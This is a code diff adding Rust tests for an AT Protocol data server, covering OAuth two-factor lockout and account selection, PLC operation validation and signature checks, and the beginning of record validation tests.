let user_did = account["did"].as_str().unwrap();
1829
+
1830
+
let db_url = common::get_db_connection_string().await;
1831
+
let pool = sqlx::postgres::PgPoolOptions::new()
1832
+
.max_connections(1)
1833
+
.connect(&db_url)
1834
+
.await
1835
+
.expect("Failed to connect to database");
1836
+
1837
+
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
1838
+
.bind(user_did)
1839
+
.execute(&pool)
1840
+
.await
1841
+
.expect("Failed to enable 2FA");
1842
+
1843
+
let redirect_uri = "https://example.com/2fa-lockout-callback";
1844
+
let mock_client = setup_mock_client_metadata(redirect_uri).await;
1845
+
let client_id = mock_client.uri();
1846
+
1847
+
let (_, code_challenge) = generate_pkce();
1848
+
1849
+
let par_body: Value = http_client
1850
+
.post(format!("{}/oauth/par", url))
1851
+
.form(&[
1852
+
("response_type", "code"),
1853
+
("client_id", &client_id),
1854
+
("redirect_uri", redirect_uri),
1855
+
("code_challenge", &code_challenge),
1856
+
("code_challenge_method", "S256"),
1857
+
])
1858
+
.send()
1859
+
.await
1860
+
.unwrap()
1861
+
.json()
1862
+
.await
1863
+
.unwrap();
1864
+
1865
+
let request_uri = par_body["request_uri"].as_str().unwrap();
1866
+
1867
+
let auth_client = no_redirect_client();
1868
+
let auth_res = auth_client
1869
+
.post(format!("{}/oauth/authorize", url))
1870
+
.form(&[
1871
+
("request_uri", request_uri),
1872
+
("username", &handle),
1873
+
("password", password),
1874
+
("remember_device", "false"),
1875
+
])
1876
+
.send()
1877
+
.await
1878
+
.unwrap();
1879
+
1880
+
assert!(auth_res.status().is_redirection());
1881
+
1882
+
for i in 0..5 {
1883
+
let res = http_client
1884
+
.post(format!("{}/oauth/authorize/2fa", url))
1885
+
.form(&[
1886
+
("request_uri", request_uri),
1887
+
("code", "999999"),
1888
+
])
1889
+
.send()
1890
+
.await
1891
+
.unwrap();
1892
+
1893
+
if i < 4 {
1894
+
assert_eq!(res.status(), StatusCode::OK, "Attempt {} should show error page", i + 1);
1895
+
let body = res.text().await.unwrap();
1896
+
assert!(
1897
+
body.contains("Invalid verification code"),
1898
+
"Should show invalid code error on attempt {}", i + 1
1899
+
);
1900
+
}
1901
+
}
1902
+
1903
+
let lockout_res = http_client
1904
+
.post(format!("{}/oauth/authorize/2fa", url))
1905
+
.form(&[
1906
+
("request_uri", request_uri),
1907
+
("code", "999999"),
1908
+
])
1909
+
.send()
1910
+
.await
1911
+
.unwrap();
1912
+
1913
+
assert_eq!(lockout_res.status(), StatusCode::OK);
1914
+
let body = lockout_res.text().await.unwrap();
1915
+
assert!(
1916
+
body.contains("Too many failed attempts") || body.contains("No 2FA challenge found"),
1917
+
"Should be locked out after max attempts. Body: {}",
1918
+
&body[..body.len().min(500)]
1919
+
);
1920
+
}
1921
+
1922
+
#[tokio::test]
1923
+
async fn test_account_selector_with_2fa_requires_verification() {
1924
+
let url = base_url().await;
1925
+
let http_client = client();
1926
+
1927
+
let ts = Utc::now().timestamp_millis();
1928
+
let handle = format!("selector-2fa-{}", ts);
1929
+
let email = format!("selector-2fa-{}@example.com", ts);
1930
+
let password = "selector-2fa-password";
1931
+
1932
+
let create_res = http_client
1933
+
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
1934
+
.json(&json!({
1935
+
"handle": handle,
1936
+
"email": email,
1937
+
"password": password
1938
+
}))
1939
+
.send()
1940
+
.await
1941
+
.unwrap();
1942
+
assert_eq!(create_res.status(), StatusCode::OK);
1943
+
let account: Value = create_res.json().await.unwrap();
1944
+
let user_did = account["did"].as_str().unwrap().to_string();
1945
+
1946
+
let redirect_uri = "https://example.com/selector-2fa-callback";
1947
+
let mock_client = setup_mock_client_metadata(redirect_uri).await;
1948
+
let client_id = mock_client.uri();
1949
+
1950
+
let (code_verifier, code_challenge) = generate_pkce();
1951
+
1952
+
let par_body: Value = http_client
1953
+
.post(format!("{}/oauth/par", url))
1954
+
.form(&[
1955
+
("response_type", "code"),
1956
+
("client_id", &client_id),
1957
+
("redirect_uri", redirect_uri),
1958
+
("code_challenge", &code_challenge),
1959
+
("code_challenge_method", "S256"),
1960
+
])
1961
+
.send()
1962
+
.await
1963
+
.unwrap()
1964
+
.json()
1965
+
.await
1966
+
.unwrap();
1967
+
1968
+
let request_uri = par_body["request_uri"].as_str().unwrap();
1969
+
1970
+
let auth_client = no_redirect_client();
1971
+
let auth_res = auth_client
1972
+
.post(format!("{}/oauth/authorize", url))
1973
+
.form(&[
1974
+
("request_uri", request_uri),
1975
+
("username", &handle),
1976
+
("password", password),
1977
+
("remember_device", "true"),
1978
+
])
1979
+
.send()
1980
+
.await
1981
+
.unwrap();
1982
+
1983
+
assert!(auth_res.status().is_redirection());
1984
+
1985
+
let device_cookie = auth_res.headers()
1986
+
.get("set-cookie")
1987
+
.and_then(|v| v.to_str().ok())
1988
+
.map(|s| s.split(';').next().unwrap_or("").to_string())
1989
+
.expect("Should have received device cookie");
1990
+
1991
+
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
1992
+
assert!(location.contains("code="), "First auth should succeed");
1993
+
1994
+
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
1995
+
let _token_body: Value = http_client
1996
+
.post(format!("{}/oauth/token", url))
1997
+
.form(&[
1998
+
("grant_type", "authorization_code"),
1999
+
("code", code),
2000
+
("redirect_uri", redirect_uri),
2001
+
("code_verifier", &code_verifier),
2002
+
("client_id", &client_id),
2003
+
])
2004
+
.send()
2005
+
.await
2006
+
.unwrap()
2007
+
.json()
2008
+
.await
2009
+
.unwrap();
2010
+
2011
+
let db_url = common::get_db_connection_string().await;
2012
+
let pool = sqlx::postgres::PgPoolOptions::new()
2013
+
.max_connections(1)
2014
+
.connect(&db_url)
2015
+
.await
2016
+
.expect("Failed to connect to database");
2017
+
2018
+
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
2019
+
.bind(&user_did)
2020
+
.execute(&pool)
2021
+
.await
2022
+
.expect("Failed to enable 2FA");
2023
+
2024
+
let (code_verifier2, code_challenge2) = generate_pkce();
2025
+
2026
+
let par_body2: Value = http_client
2027
+
.post(format!("{}/oauth/par", url))
2028
+
.form(&[
2029
+
("response_type", "code"),
2030
+
("client_id", &client_id),
2031
+
("redirect_uri", redirect_uri),
2032
+
("code_challenge", &code_challenge2),
2033
+
("code_challenge_method", "S256"),
2034
+
])
2035
+
.send()
2036
+
.await
2037
+
.unwrap()
2038
+
.json()
2039
+
.await
2040
+
.unwrap();
2041
+
2042
+
let request_uri2 = par_body2["request_uri"].as_str().unwrap();
2043
+
2044
+
let select_res = auth_client
2045
+
.post(format!("{}/oauth/authorize/select", url))
2046
+
.header("cookie", &device_cookie)
2047
+
.form(&[
2048
+
("request_uri", request_uri2),
2049
+
("did", &user_did),
2050
+
])
2051
+
.send()
2052
+
.await
2053
+
.unwrap();
2054
+
2055
+
assert!(
2056
+
select_res.status().is_redirection(),
2057
+
"Account selector should redirect, got status: {}",
2058
+
select_res.status()
2059
+
);
2060
+
2061
+
let select_location = select_res.headers().get("location").unwrap().to_str().unwrap();
2062
+
assert!(
2063
+
select_location.contains("/oauth/authorize/2fa"),
2064
+
"Account selector with 2FA enabled should redirect to 2FA page, got: {}",
2065
+
select_location
2066
+
);
2067
+
2068
+
let twofa_code: String = sqlx::query_scalar(
2069
+
"SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1"
2070
+
)
2071
+
.bind(request_uri2)
2072
+
.fetch_one(&pool)
2073
+
.await
2074
+
.expect("Failed to get 2FA code");
2075
+
2076
+
let twofa_res = auth_client
2077
+
.post(format!("{}/oauth/authorize/2fa", url))
2078
+
.header("cookie", &device_cookie)
2079
+
.form(&[
2080
+
("request_uri", request_uri2),
2081
+
("code", &twofa_code),
2082
+
])
2083
+
.send()
2084
+
.await
2085
+
.unwrap();
2086
+
2087
+
assert!(twofa_res.status().is_redirection());
2088
+
let final_location = twofa_res.headers().get("location").unwrap().to_str().unwrap();
2089
+
assert!(
2090
+
final_location.starts_with(redirect_uri) && final_location.contains("code="),
2091
+
"After 2FA, should redirect to client with code, got: {}",
2092
+
final_location
2093
+
);
2094
+
2095
+
let final_code = final_location.split("code=").nth(1).unwrap().split('&').next().unwrap();
2096
+
let token_res = http_client
2097
+
.post(format!("{}/oauth/token", url))
2098
+
.form(&[
2099
+
("grant_type", "authorization_code"),
2100
+
("code", final_code),
2101
+
("redirect_uri", redirect_uri),
2102
+
("code_verifier", &code_verifier2),
2103
+
("client_id", &client_id),
2104
+
])
2105
+
.send()
2106
+
.await
2107
+
.unwrap();
2108
+
2109
+
assert_eq!(token_res.status(), StatusCode::OK);
2110
+
let final_token: Value = token_res.json().await.unwrap();
2111
+
assert_eq!(final_token["sub"], user_did, "Token should be for the correct user");
2112
+
}
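The PKCE values used throughout these OAuth tests come from a shared generate_pkce() helper that is not shown in this diff. As a reference point, a minimal sketch of S256 code_verifier/code_challenge generation, assuming the rand, sha2, and base64 crates (the suite's actual helper may differ):

// Hypothetical sketch of S256 PKCE generation, not the suite's actual helper.
use base64::Engine;
use rand::Rng;
use sha2::{Digest, Sha256};

fn generate_pkce_sketch() -> (String, String) {
    // Random 64-character verifier drawn from unreserved characters.
    let verifier: String = rand::thread_rng()
        .sample_iter(&rand::distributions::Alphanumeric)
        .take(64)
        .map(char::from)
        .collect();
    // The challenge is the base64url-encoded (no padding) SHA-256 of the verifier.
    let digest = Sha256::digest(verifier.as_bytes());
    let challenge = base64::engine::general_purpose::URL_SAFE_NO_PAD.encode(digest);
    (verifier, challenge)
}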
+1 tests/oauth_security.rs
+2 tests/plc_migration.rs
···
255
}
256
257
#[tokio::test]
258
async fn test_sign_plc_operation_consumes_token() {
259
let client = client();
260
let (token, did) = create_account_and_login(&client).await;
···
902
}
903
904
#[tokio::test]
905
async fn test_full_migration_flow_end_to_end() {
906
let client = client();
907
let (token, did) = create_account_and_login(&client).await;
···
255
}
256
257
#[tokio::test]
258
+
#[ignore = "requires exclusive env var access; run with: cargo test test_sign_plc_operation_consumes_token -- --ignored --test-threads=1"]
259
async fn test_sign_plc_operation_consumes_token() {
260
let client = client();
261
let (token, did) = create_account_and_login(&client).await;
···
903
}
904
905
#[tokio::test]
906
+
#[ignore = "requires exclusive env var access; run with: cargo test test_full_migration_flow_end_to_end -- --ignored --test-threads=1"]
907
async fn test_full_migration_flow_end_to_end() {
908
let client = client();
909
let (token, did) = create_account_and_login(&client).await;
+513 tests/plc_validation.rs
···
···
1
+
use bspds::plc::{
2
+
PlcError, PlcOperation, PlcService, PlcValidationContext,
3
+
cid_for_cbor, sign_operation, signing_key_to_did_key,
4
+
validate_plc_operation, validate_plc_operation_for_submission,
5
+
verify_operation_signature,
6
+
};
7
+
use k256::ecdsa::SigningKey;
8
+
use serde_json::json;
9
+
use std::collections::HashMap;
10
+
11
+
fn create_valid_operation() -> serde_json::Value {
12
+
let key = SigningKey::random(&mut rand::thread_rng());
13
+
let did_key = signing_key_to_did_key(&key);
14
+
15
+
let op = json!({
16
+
"type": "plc_operation",
17
+
"rotationKeys": [did_key.clone()],
18
+
"verificationMethods": {
19
+
"atproto": did_key.clone()
20
+
},
21
+
"alsoKnownAs": ["at://test.handle"],
22
+
"services": {
23
+
"atproto_pds": {
24
+
"type": "AtprotoPersonalDataServer",
25
+
"endpoint": "https://pds.example.com"
26
+
}
27
+
},
28
+
"prev": null
29
+
});
30
+
31
+
sign_operation(&op, &key).unwrap()
32
+
}
33
+
34
+
#[test]
35
+
fn test_validate_plc_operation_valid() {
36
+
let op = create_valid_operation();
37
+
let result = validate_plc_operation(&op);
38
+
assert!(result.is_ok());
39
+
}
40
+
41
+
#[test]
42
+
fn test_validate_plc_operation_missing_type() {
43
+
let op = json!({
44
+
"rotationKeys": [],
45
+
"verificationMethods": {},
46
+
"alsoKnownAs": [],
47
+
"services": {},
48
+
"sig": "test"
49
+
});
50
+
let result = validate_plc_operation(&op);
51
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type")));
52
+
}
53
+
54
+
#[test]
55
+
fn test_validate_plc_operation_invalid_type() {
56
+
let op = json!({
57
+
"type": "invalid_type",
58
+
"sig": "test"
59
+
});
60
+
let result = validate_plc_operation(&op);
61
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type")));
62
+
}
63
+
64
+
#[test]
65
+
fn test_validate_plc_operation_missing_sig() {
66
+
let op = json!({
67
+
"type": "plc_operation",
68
+
"rotationKeys": [],
69
+
"verificationMethods": {},
70
+
"alsoKnownAs": [],
71
+
"services": {}
72
+
});
73
+
let result = validate_plc_operation(&op);
74
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig")));
75
+
}
76
+
77
+
#[test]
78
+
fn test_validate_plc_operation_missing_rotation_keys() {
79
+
let op = json!({
80
+
"type": "plc_operation",
81
+
"verificationMethods": {},
82
+
"alsoKnownAs": [],
83
+
"services": {},
84
+
"sig": "test"
85
+
});
86
+
let result = validate_plc_operation(&op);
87
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys")));
88
+
}
89
+
90
+
#[test]
91
+
fn test_validate_plc_operation_missing_verification_methods() {
92
+
let op = json!({
93
+
"type": "plc_operation",
94
+
"rotationKeys": [],
95
+
"alsoKnownAs": [],
96
+
"services": {},
97
+
"sig": "test"
98
+
});
99
+
let result = validate_plc_operation(&op);
100
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods")));
101
+
}
102
+
103
+
#[test]
104
+
fn test_validate_plc_operation_missing_also_known_as() {
105
+
let op = json!({
106
+
"type": "plc_operation",
107
+
"rotationKeys": [],
108
+
"verificationMethods": {},
109
+
"services": {},
110
+
"sig": "test"
111
+
});
112
+
let result = validate_plc_operation(&op);
113
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs")));
114
+
}
115
+
116
+
#[test]
117
+
fn test_validate_plc_operation_missing_services() {
118
+
let op = json!({
119
+
"type": "plc_operation",
120
+
"rotationKeys": [],
121
+
"verificationMethods": {},
122
+
"alsoKnownAs": [],
123
+
"sig": "test"
124
+
});
125
+
let result = validate_plc_operation(&op);
126
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("services")));
127
+
}
128
+
129
+
#[test]
130
+
fn test_validate_rotation_key_required() {
131
+
let key = SigningKey::random(&mut rand::thread_rng());
132
+
let did_key = signing_key_to_did_key(&key);
133
+
let server_key = "did:key:zServer123";
134
+
135
+
let op = json!({
136
+
"type": "plc_operation",
137
+
"rotationKeys": [did_key.clone()],
138
+
"verificationMethods": {"atproto": did_key.clone()},
139
+
"alsoKnownAs": ["at://test.handle"],
140
+
"services": {
141
+
"atproto_pds": {
142
+
"type": "AtprotoPersonalDataServer",
143
+
"endpoint": "https://pds.example.com"
144
+
}
145
+
},
146
+
"sig": "test"
147
+
});
148
+
149
+
let ctx = PlcValidationContext {
150
+
server_rotation_key: server_key.to_string(),
151
+
expected_signing_key: did_key.clone(),
152
+
expected_handle: "test.handle".to_string(),
153
+
expected_pds_endpoint: "https://pds.example.com".to_string(),
154
+
};
155
+
156
+
let result = validate_plc_operation_for_submission(&op, &ctx);
157
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key")));
158
+
}
159
+
160
+
#[test]
161
+
fn test_validate_signing_key_match() {
162
+
let key = SigningKey::random(&mut rand::thread_rng());
163
+
let did_key = signing_key_to_did_key(&key);
164
+
let wrong_key = "did:key:zWrongKey456";
165
+
166
+
let op = json!({
167
+
"type": "plc_operation",
168
+
"rotationKeys": [did_key.clone()],
169
+
"verificationMethods": {"atproto": wrong_key},
170
+
"alsoKnownAs": ["at://test.handle"],
171
+
"services": {
172
+
"atproto_pds": {
173
+
"type": "AtprotoPersonalDataServer",
174
+
"endpoint": "https://pds.example.com"
175
+
}
176
+
},
177
+
"sig": "test"
178
+
});
179
+
180
+
let ctx = PlcValidationContext {
181
+
server_rotation_key: did_key.clone(),
182
+
expected_signing_key: did_key.clone(),
183
+
expected_handle: "test.handle".to_string(),
184
+
expected_pds_endpoint: "https://pds.example.com".to_string(),
185
+
};
186
+
187
+
let result = validate_plc_operation_for_submission(&op, &ctx);
188
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key")));
189
+
}
190
+
191
+
#[test]
192
+
fn test_validate_handle_match() {
193
+
let key = SigningKey::random(&mut rand::thread_rng());
194
+
let did_key = signing_key_to_did_key(&key);
195
+
196
+
let op = json!({
197
+
"type": "plc_operation",
198
+
"rotationKeys": [did_key.clone()],
199
+
"verificationMethods": {"atproto": did_key.clone()},
200
+
"alsoKnownAs": ["at://wrong.handle"],
201
+
"services": {
202
+
"atproto_pds": {
203
+
"type": "AtprotoPersonalDataServer",
204
+
"endpoint": "https://pds.example.com"
205
+
}
206
+
},
207
+
"sig": "test"
208
+
});
209
+
210
+
let ctx = PlcValidationContext {
211
+
server_rotation_key: did_key.clone(),
212
+
expected_signing_key: did_key.clone(),
213
+
expected_handle: "test.handle".to_string(),
214
+
expected_pds_endpoint: "https://pds.example.com".to_string(),
215
+
};
216
+
217
+
let result = validate_plc_operation_for_submission(&op, &ctx);
218
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("handle")));
219
+
}
220
+
221
+
#[test]
222
+
fn test_validate_pds_service_type() {
223
+
let key = SigningKey::random(&mut rand::thread_rng());
224
+
let did_key = signing_key_to_did_key(&key);
225
+
226
+
let op = json!({
227
+
"type": "plc_operation",
228
+
"rotationKeys": [did_key.clone()],
229
+
"verificationMethods": {"atproto": did_key.clone()},
230
+
"alsoKnownAs": ["at://test.handle"],
231
+
"services": {
232
+
"atproto_pds": {
233
+
"type": "WrongServiceType",
234
+
"endpoint": "https://pds.example.com"
235
+
}
236
+
},
237
+
"sig": "test"
238
+
});
239
+
240
+
let ctx = PlcValidationContext {
241
+
server_rotation_key: did_key.clone(),
242
+
expected_signing_key: did_key.clone(),
243
+
expected_handle: "test.handle".to_string(),
244
+
expected_pds_endpoint: "https://pds.example.com".to_string(),
245
+
};
246
+
247
+
let result = validate_plc_operation_for_submission(&op, &ctx);
248
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("type")));
249
+
}
250
+
251
+
#[test]
252
+
fn test_validate_pds_endpoint_match() {
253
+
let key = SigningKey::random(&mut rand::thread_rng());
254
+
let did_key = signing_key_to_did_key(&key);
255
+
256
+
let op = json!({
257
+
"type": "plc_operation",
258
+
"rotationKeys": [did_key.clone()],
259
+
"verificationMethods": {"atproto": did_key.clone()},
260
+
"alsoKnownAs": ["at://test.handle"],
261
+
"services": {
262
+
"atproto_pds": {
263
+
"type": "AtprotoPersonalDataServer",
264
+
"endpoint": "https://wrong.endpoint.com"
265
+
}
266
+
},
267
+
"sig": "test"
268
+
});
269
+
270
+
let ctx = PlcValidationContext {
271
+
server_rotation_key: did_key.clone(),
272
+
expected_signing_key: did_key.clone(),
273
+
expected_handle: "test.handle".to_string(),
274
+
expected_pds_endpoint: "https://pds.example.com".to_string(),
275
+
};
276
+
277
+
let result = validate_plc_operation_for_submission(&op, &ctx);
278
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint")));
279
+
}
280
+
281
+
#[test]
282
+
fn test_verify_signature_secp256k1() {
283
+
let key = SigningKey::random(&mut rand::thread_rng());
284
+
let did_key = signing_key_to_did_key(&key);
285
+
286
+
let op = json!({
287
+
"type": "plc_operation",
288
+
"rotationKeys": [did_key.clone()],
289
+
"verificationMethods": {},
290
+
"alsoKnownAs": [],
291
+
"services": {},
292
+
"prev": null
293
+
});
294
+
295
+
let signed = sign_operation(&op, &key).unwrap();
296
+
let rotation_keys = vec![did_key];
297
+
298
+
let result = verify_operation_signature(&signed, &rotation_keys);
299
+
assert!(result.is_ok());
300
+
assert!(result.unwrap());
301
+
}
302
+
303
+
#[test]
304
+
fn test_verify_signature_wrong_key() {
305
+
let key = SigningKey::random(&mut rand::thread_rng());
306
+
let other_key = SigningKey::random(&mut rand::thread_rng());
307
+
let other_did_key = signing_key_to_did_key(&other_key);
308
+
309
+
let op = json!({
310
+
"type": "plc_operation",
311
+
"rotationKeys": [],
312
+
"verificationMethods": {},
313
+
"alsoKnownAs": [],
314
+
"services": {},
315
+
"prev": null
316
+
});
317
+
318
+
let signed = sign_operation(&op, &key).unwrap();
319
+
let wrong_rotation_keys = vec![other_did_key];
320
+
321
+
let result = verify_operation_signature(&signed, &wrong_rotation_keys);
322
+
assert!(result.is_ok());
323
+
assert!(!result.unwrap());
324
+
}
325
+
326
+
#[test]
327
+
fn test_verify_signature_invalid_did_key_format() {
328
+
let key = SigningKey::random(&mut rand::thread_rng());
329
+
330
+
let op = json!({
331
+
"type": "plc_operation",
332
+
"rotationKeys": [],
333
+
"verificationMethods": {},
334
+
"alsoKnownAs": [],
335
+
"services": {},
336
+
"prev": null
337
+
});
338
+
339
+
let signed = sign_operation(&op, &key).unwrap();
340
+
let invalid_keys = vec!["not-a-did-key".to_string()];
341
+
342
+
let result = verify_operation_signature(&signed, &invalid_keys);
343
+
assert!(result.is_ok());
344
+
assert!(!result.unwrap());
345
+
}
346
+
347
+
#[test]
348
+
fn test_tombstone_validation() {
349
+
let op = json!({
350
+
"type": "plc_tombstone",
351
+
"prev": "bafyreig6xxxxxyyyyyzzzzzz",
352
+
"sig": "test"
353
+
});
354
+
let result = validate_plc_operation(&op);
355
+
assert!(result.is_ok());
356
+
}
357
+
358
+
#[test]
359
+
fn test_cid_for_cbor_deterministic() {
360
+
let value = json!({
361
+
"alpha": 1,
362
+
"beta": 2
363
+
});
364
+
365
+
let cid1 = cid_for_cbor(&value).unwrap();
366
+
let cid2 = cid_for_cbor(&value).unwrap();
367
+
368
+
assert_eq!(cid1, cid2, "CID generation should be deterministic");
369
+
assert!(cid1.starts_with("bafyrei"), "CID should start with bafyrei (dag-cbor + sha256)");
370
+
}
371
+
372
+
#[test]
373
+
fn test_cid_different_for_different_data() {
374
+
let value1 = json!({"data": 1});
375
+
let value2 = json!({"data": 2});
376
+
377
+
let cid1 = cid_for_cbor(&value1).unwrap();
378
+
let cid2 = cid_for_cbor(&value2).unwrap();
379
+
380
+
assert_ne!(cid1, cid2, "Different data should produce different CIDs");
381
+
}
382
+
383
+
#[test]
384
+
fn test_signing_key_to_did_key_format() {
385
+
let key = SigningKey::random(&mut rand::thread_rng());
386
+
let did_key = signing_key_to_did_key(&key);
387
+
388
+
assert!(did_key.starts_with("did:key:z"), "Should start with did:key:z");
389
+
assert!(did_key.len() > 50, "did:key should be reasonably long");
390
+
}
391
+
392
+
#[test]
393
+
fn test_signing_key_to_did_key_unique() {
394
+
let key1 = SigningKey::random(&mut rand::thread_rng());
395
+
let key2 = SigningKey::random(&mut rand::thread_rng());
396
+
397
+
let did1 = signing_key_to_did_key(&key1);
398
+
let did2 = signing_key_to_did_key(&key2);
399
+
400
+
assert_ne!(did1, did2, "Different keys should produce different did:keys");
401
+
}
402
+
403
+
#[test]
404
+
fn test_signing_key_to_did_key_consistent() {
405
+
let key = SigningKey::random(&mut rand::thread_rng());
406
+
407
+
let did1 = signing_key_to_did_key(&key);
408
+
let did2 = signing_key_to_did_key(&key);
409
+
410
+
assert_eq!(did1, did2, "Same key should produce same did:key");
411
+
}
412
+
413
+
#[test]
414
+
fn test_sign_operation_removes_existing_sig() {
415
+
let key = SigningKey::random(&mut rand::thread_rng());
416
+
let op = json!({
417
+
"type": "plc_operation",
418
+
"rotationKeys": [],
419
+
"verificationMethods": {},
420
+
"alsoKnownAs": [],
421
+
"services": {},
422
+
"prev": null,
423
+
"sig": "old_signature"
424
+
});
425
+
426
+
let signed = sign_operation(&op, &key).unwrap();
427
+
let new_sig = signed.get("sig").and_then(|v| v.as_str()).unwrap();
428
+
429
+
assert_ne!(new_sig, "old_signature", "Should replace old signature");
430
+
}
431
+
432
+
#[test]
433
+
fn test_validate_plc_operation_not_object() {
434
+
let result = validate_plc_operation(&json!("not an object"));
435
+
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
436
+
}
437
+
438
+
#[test]
439
+
fn test_validate_for_submission_tombstone_passes() {
440
+
let key = SigningKey::random(&mut rand::thread_rng());
441
+
let did_key = signing_key_to_did_key(&key);
442
+
443
+
let op = json!({
444
+
"type": "plc_tombstone",
445
+
"prev": "bafyreig6xxxxxyyyyyzzzzzz",
446
+
"sig": "test"
447
+
});
448
+
449
+
let ctx = PlcValidationContext {
450
+
server_rotation_key: did_key.clone(),
451
+
expected_signing_key: did_key,
452
+
expected_handle: "test.handle".to_string(),
453
+
expected_pds_endpoint: "https://pds.example.com".to_string(),
454
+
};
455
+
456
+
let result = validate_plc_operation_for_submission(&op, &ctx);
457
+
assert!(result.is_ok(), "Tombstone should pass submission validation");
458
+
}
459
+
460
+
#[test]
461
+
fn test_verify_signature_missing_sig() {
462
+
let op = json!({
463
+
"type": "plc_operation",
464
+
"rotationKeys": [],
465
+
"verificationMethods": {},
466
+
"alsoKnownAs": [],
467
+
"services": {}
468
+
});
469
+
470
+
let result = verify_operation_signature(&op, &[]);
471
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("sig")));
472
+
}
473
+
474
+
#[test]
475
+
fn test_verify_signature_invalid_base64() {
476
+
let op = json!({
477
+
"type": "plc_operation",
478
+
"rotationKeys": [],
479
+
"verificationMethods": {},
480
+
"alsoKnownAs": [],
481
+
"services": {},
482
+
"sig": "not-valid-base64!!!"
483
+
});
484
+
485
+
let result = verify_operation_signature(&op, &[]);
486
+
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
487
+
}
488
+
489
+
#[test]
490
+
fn test_plc_operation_struct() {
491
+
let mut services = HashMap::new();
492
+
services.insert("atproto_pds".to_string(), PlcService {
493
+
service_type: "AtprotoPersonalDataServer".to_string(),
494
+
endpoint: "https://pds.example.com".to_string(),
495
+
});
496
+
497
+
let mut verification_methods = HashMap::new();
498
+
verification_methods.insert("atproto".to_string(), "did:key:zTest123".to_string());
499
+
500
+
let op = PlcOperation {
501
+
op_type: "plc_operation".to_string(),
502
+
rotation_keys: vec!["did:key:zTest123".to_string()],
503
+
verification_methods,
504
+
also_known_as: vec!["at://test.handle".to_string()],
505
+
services,
506
+
prev: None,
507
+
sig: Some("test".to_string()),
508
+
};
509
+
510
+
let json_value = serde_json::to_value(&op).unwrap();
511
+
assert_eq!(json_value["type"], "plc_operation");
512
+
assert!(json_value["rotationKeys"].is_array());
513
+
}
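For context on the did:key assertions above: a secp256k1 did:key is the multicodec secp256k1-pub prefix (0xe7, varint-encoded as the two bytes 0xe7 0x01) followed by the 33-byte compressed public key, base58btc-encoded with a leading 'z'. A minimal sketch of that encoding, assuming the bs58 crate (the crate's signing_key_to_did_key may be implemented differently):

// Hypothetical sketch of the did:key format the assertions above expect.
use k256::ecdsa::SigningKey;
use k256::elliptic_curve::sec1::ToEncodedPoint;

fn did_key_sketch(key: &SigningKey) -> String {
    let point = key.verifying_key().to_encoded_point(true); // 33-byte SEC1 compressed point
    let mut bytes = vec![0xe7, 0x01]; // multicodec secp256k1-pub, varint-encoded
    bytes.extend_from_slice(point.as_bytes());
    format!("did:key:z{}", bs58::encode(bytes).into_string()) // 'z' marks multibase base58btc
}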
+590 tests/record_validation.rs
···
···
1
+
use bspds::validation::{RecordValidator, ValidationError, ValidationStatus, validate_record_key, validate_collection_nsid};
2
+
use serde_json::json;
3
+
4
+
fn now() -> String {
5
+
chrono::Utc::now().to_rfc3339()
6
+
}
7
+
8
+
#[test]
9
+
fn test_validate_post_valid() {
10
+
let validator = RecordValidator::new();
11
+
let post = json!({
12
+
"$type": "app.bsky.feed.post",
13
+
"text": "Hello world!",
14
+
"createdAt": now()
15
+
});
16
+
let result = validator.validate(&post, "app.bsky.feed.post");
17
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
18
+
}
19
+
20
+
#[test]
21
+
fn test_validate_post_missing_text() {
22
+
let validator = RecordValidator::new();
23
+
let post = json!({
24
+
"$type": "app.bsky.feed.post",
25
+
"createdAt": now()
26
+
});
27
+
let result = validator.validate(&post, "app.bsky.feed.post");
28
+
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "text"));
29
+
}
30
+
31
+
#[test]
32
+
fn test_validate_post_missing_created_at() {
33
+
let validator = RecordValidator::new();
34
+
let post = json!({
35
+
"$type": "app.bsky.feed.post",
36
+
"text": "Hello"
37
+
});
38
+
let result = validator.validate(&post, "app.bsky.feed.post");
39
+
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "createdAt"));
40
+
}
41
+
42
+
#[test]
43
+
fn test_validate_post_text_too_long() {
44
+
let validator = RecordValidator::new();
45
+
let long_text = "a".repeat(3001);
46
+
let post = json!({
47
+
"$type": "app.bsky.feed.post",
48
+
"text": long_text,
49
+
"createdAt": now()
50
+
});
51
+
let result = validator.validate(&post, "app.bsky.feed.post");
52
+
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "text"));
53
+
}
54
+
55
+
#[test]
56
+
fn test_validate_post_text_at_limit() {
57
+
let validator = RecordValidator::new();
58
+
let limit_text = "a".repeat(3000);
59
+
let post = json!({
60
+
"$type": "app.bsky.feed.post",
61
+
"text": limit_text,
62
+
"createdAt": now()
63
+
});
64
+
let result = validator.validate(&post, "app.bsky.feed.post");
65
+
assert_eq!(result.unwrap(), ValidationStatus::Valid);
66
+
}
67
+
68
+
#[test]
69
+
fn test_validate_post_too_many_langs() {
70
+
let validator = RecordValidator::new();
71
+
let post = json!({
72
+
"$type": "app.bsky.feed.post",
73
+
"text": "Hello",
74
+
"createdAt": now(),
75
+
